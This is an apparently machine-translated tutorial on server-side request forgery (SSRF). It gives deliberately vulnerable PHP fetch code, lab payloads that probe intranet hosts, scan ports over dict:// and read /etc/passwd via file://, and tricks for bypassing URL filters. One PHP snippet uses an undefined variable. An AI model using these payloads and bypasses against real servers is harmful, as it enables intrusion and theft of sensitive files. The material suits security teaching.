Solemnly declare:
This note is only prepared for the purpose of improving safety knowledge and sharing safety knowledge with more people. Do not use the technology in the note for illegal activities. The consequences caused by using the technology in the note have nothing to do with the author himself. It is everyone's responsibility to maintain network security and jointly maintain network civilization and harmony.

1 Introduction to SSRF

SSRF (server side request forgery) is a security vulnerability constructed by an attacker to form a request initiated by the server. Generally, the target of SSRF attack is the internal system that cannot be accessed from the external network. (it is precisely because it is initiated by the server that it can request the internal system connected to it and isolated from the external network, that is, the target website acts as an intermediary)

The reason for the formation of SSRF is that the server provides the function of obtaining data from other server applications, and does not filter and restrict the target address. For example, get web page text content from the specified URL address, load pictures and documents at the specified address, and so on.

2 hazards caused by SSRF

1. Scan intranet: scan the ports and services of Intranet and extranet

   Obtain the banner information of Web application reachable server (such as software developer, software name, etc.), and collect the fingerprint identification of Intranet Web application (such as open port, middleware version, etc.), and further penetrate according to these information;

2. Attack applications running on the intranet or local (such as overflow)

   Obtain the weak password of the intranet system for intranet roaming, attack the vulnerable intranet Web application, and obtain the webshell

3. Attacking Web applications on Intranet and intranet is mainly an attack that can be realized by using GET method

4. Use file protocol to read local sensitive files, etc

   Use vulnerable components in combination with ftp: / /, file: / /, gopher: / /, dict: / /, and other protocols to carry out attacks (such as FFmpeg arbitrary file reading, XXE attack, etc.).

3 possible SSRF vulnerabilities

SSRF vulnerabilities may exist whenever resources are requested from a remote server

• Share: share web content through URL address

• Transcoding service

• online translation

• Picture loading and downloading: load or download pictures through URL address

• Picture and article collection function

• Unpublished API implementations and other functions that call URL s

• Find from URL keywords

  • share
    wap
    url
    link
    src
    source
    target
    u
    3g
    display
    sourceURl
    imageURL
    domain
    

4 SSRF vulnerability verification

4.1 exclusion verification

4.1.1 click verification

Or take the picture as an example:

• Find the accessed resource address in the page source code. If the resource address type is www.target com/xxx. php? image= http://image_address.com There may be an SSRF vulnerability

• You can directly right-click the picture and open the picture in a new window. If it is the URL address bar on the browser, it is http://image_address.com Indicates that there is no SSRF vulnerability.

4.1.2 packet capture analysis

Because the SSRF vulnerability is a security vulnerability that allows the server to send requests, we can judge whether there is an SSRF vulnerability by capturing packets and analyzing whether the sent requests are sent by the server

GET /ssrf01.php?url=http://192.168.100.129/phpMyAdmin/favicon.ico HTTP/1.1
Host: ssrf.lab.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=bvp2vv845n0les2efk4hg5b445
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1
# SSRF vulnerability exists here

5. SSRF utilization mode

SSRF PHP - p0pl4r - blog Garden (cnblogs.com)

5.1 unlimited

5.1.1 ssrf01.php

<?php
function curl($url){  
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_exec($ch);
    curl_close($ch);
}

$data = $_GET['url'];
$ret = curl($url);
echo $ret;
?>

<?php
include 'init.php';
if ($_GET['url']) {
        // Client
        $url = $_GET['url'];
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_NOSIGNAL, 1);
        curl_setopt($ch, CURLOPT_TIMEOUT_MS, 5000);
        $data = curl_exec($ch);
        $curl_errno = curl_errno($ch);
        $curl_error = curl_error($ch);
        curl_close($ch);

        if ($curl_errno > 0) {
                echo "cURL Error ($curl_errno): $curl_error\n";
        } else {
                echo "$data\n";
        }
} else {
        // Server
        sleep(10);
        echo "Done.";
}
?>

5.1.2 using Payload

// Using http protocol to view intranet hosts
http://ssrf.lab.com/ssrf01.php?url=http://192.168.100.129

// Arbitrary file reading using File Protocol
http://ssrf.lab.com/ssrf01.php?url=file:///etc/passwd

// #Viewing ports using dict protocol
http://ssrf.lab.com/ssrf01.php?url=dict://192.168.100.129:80

6 bypass mode

1. http://www.baidu.com@10.10.10.10 and http://10.10.10.10 The request is the same, and the content obtained by the access request is the content of 10.10.10.10.

2. IP address is converted into hexadecimal to access

3. Adding ports may bypass matching rules, 10.10.10.10:80

4. Bypass with short address (302 jump)

5. Using Enclosed alphanumerics

   ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ  >>>  example.com
   List:
   ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿